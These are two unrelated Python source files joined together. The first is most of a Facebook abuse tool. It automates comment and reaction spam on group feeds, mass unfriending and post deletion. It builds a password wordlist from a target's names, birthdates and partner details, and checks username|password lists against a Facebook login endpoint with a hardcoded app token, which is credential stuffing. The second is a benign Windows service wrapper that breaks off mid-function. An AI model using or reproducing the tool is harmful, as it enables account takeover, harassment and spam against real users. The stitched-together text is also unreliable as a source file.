raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
service.py
|
#
# This code is a modified version of the django_windows_tools/service.py
# file located at https://github.com/antoinemartin/django-windows-tools/
#
# FastCGI-to-WSGI bridge for files/pipes transport (not socket)
#
# Copyright (c) 2012 Openance SARL
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import win32serviceutil
import subprocess
import os
import os.path
import sys
import platform
import multiprocessing.forking
import logging
import ConfigParser
import ctypes
import traceback
import win32service
import win32event
import win32con
import win32file
from os.path import abspath, dirname
from multiprocessing import Process
from multiprocessing.util import get_logger
GenerateConsoleCtrlEvent = ctypes.windll.kernel32.GenerateConsoleCtrlEvent
old_get_preparation_data = multiprocessing.forking.get_preparation_data
# Monkey patch the Windows Process implementation to avoid thinking
# That 'PythonService.exe' is a python script
def new_get_preparation_data(name):
d = old_get_preparation_data(name)
if 'main_path' in d and d['main_path'].lower().endswith('.exe'):
del d['main_path']
return d
multiprocessing.forking.get_preparation_data = new_get_preparation_data
# Do the same monkey patching on billiard which is a fork of
# multiprocessing
try:
import billiard.forking as billiard_forking
billiard_old_get_preparation_data = billiard_forking.get_preparation_data
def billiard_new_get_preparation_data(name):
d = billiard_old_get_preparation_data(name)
if 'main_path' in d and d['main_path'].lower().endswith('.exe'):
d['main_path'] = '__main__.py'
return d
billiard_forking.get_preparation_data = billiard_new_get_preparation_data
except:
pass
def log(msg):
'''Log a message in the Event Viewer as an informational message'''
import servicemanager
servicemanager.LogInfoMsg(str(msg))
def error(msg):
'''Log a message in the Event Viewer as an error message'''
import servicemanager
servicemanager.LogErrorMsg(str(msg))
def initialize_logger(config):
class StdErrWrapper:
"""
Call wrapper for stderr
"""
def write(self, s):
get_logger().info(s)
import logging
logger = get_logger()
values = dict(
format='[%(levelname)s/%(processName)s] %(message)s',
filename=None,
level='INFO',
)
if config and config.has_section('log'):
for (name, value) in config.items('log'):
values[name] = value
if values['filename']:
formatter = logging.Formatter(values['format'])
handler = logging.FileHandler(values['filename'])
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(
getattr(logging, values['level'].upper(), logging.INFO)
)
sys.stderr = StdErrWrapper()
def start_command(config, args):
initialize_logger(config)
print('starting command: %s' % ' '.join(args))
get_logger().info("Starting command: %s" % " ".join(args))
try:
subprocess.call(args, shell=True)
except:
pass
def spawn_command(config, server_name):
'''
Spawn a command specified in a configuration file and return the process
object.
'''
args = []
args.append(config.get(server_name, 'command'))
args += config.get(server_name, 'parameters').split()
process = Process(target=start_command, args=(config, args,))
process.start()
log('Spawned %s' % ' '.join(args))
return process
def start_commands(config):
'''
Spawn all the commands specified in a configuration file and return an
array containing all the processes.
'''
processes = []
node_name = platform.node()
if config.has_section(node_name):
services = config.get(node_name, 'run')
else:
services = config.get('services', 'run')
for server_name in services.split():
processes.append(spawn_command(config, server_name))
return processes
def end_commands(processes):
'''
Terminate all the processes in the specified array.
'''
for process in processes:
process.terminate()
process.join()
def test_commands(base_path=None, timeout=10):
'''
Method to test the spawn and termination of commands present in the
configuration file.
'''
config = read_config(base_path)
initialize_logger(config)
processes = start_commands(config)
import time
time.sleep(timeout)
end_commands(processes)
def get_config_modification_handle(path=None):
'''Returns a Directory change handle on the configuration directory.
This handle will be used to restart the IRMA commands child processes
in case the configuration file has changed in the directory.
'''
if not path:
path = dirname(abspath(__file__))
change_handle = win32file.FindFirstChangeNotification(
path,
0,
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE
)
return change_handle
def read_config(base_path=None, filename='service.ini'):
'''
Reads the configuration file containing processes to spawn information
'''
if not base_path:
base_path = dirname(abspath(__file__))
config = ConfigParser.ConfigParser()
config.optionxform = str
path = os.path.join(base_path, filename)
log(path)
config.read(path)
return config
class IRMAService(win32serviceutil.ServiceFramework):
"""NT Service."""
_svc_name_ = "irma-service"
_svc_display_name_ = "IRMA background Processes"
_svc_description_ = "Run the IRMA background Processes"
_config_filename = 'service.ini'
_base_path = dirname(abspath(__file__))
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
log('Initialization')
# create an event that SvcDoRun can wait on and SvcStop
# can set.
self.config = read_config(self._base_path, self._config_filename)
initialize_logger(self.config)
if self._base_path not in sys.path:
sys.path.append(self._base_path)
parent_path = dirname(self._base_path)
if parent_path not in sys.path:
sys.path.append(parent_path)
self.stop_event = win32event.CreateEvent(None, 0, 0, None)
def SvcDoRun(self):
self.ReportServiceStatus(win32service.SERVICE_START_PENDING)
log('starting')
self.ReportServiceStatus(win32service.SERVICE_RUNNING)
base_path = self._base_path
config_filename = self._config_filename
self.modification_handle = get_config_modification_handle(base_path)
config_filepath = os.path.join(base_path, config_filename)
self.configuration_mtime = os.stat(config_filepath).st_mtime
keep_running = True
do_start = True
while keep_running:
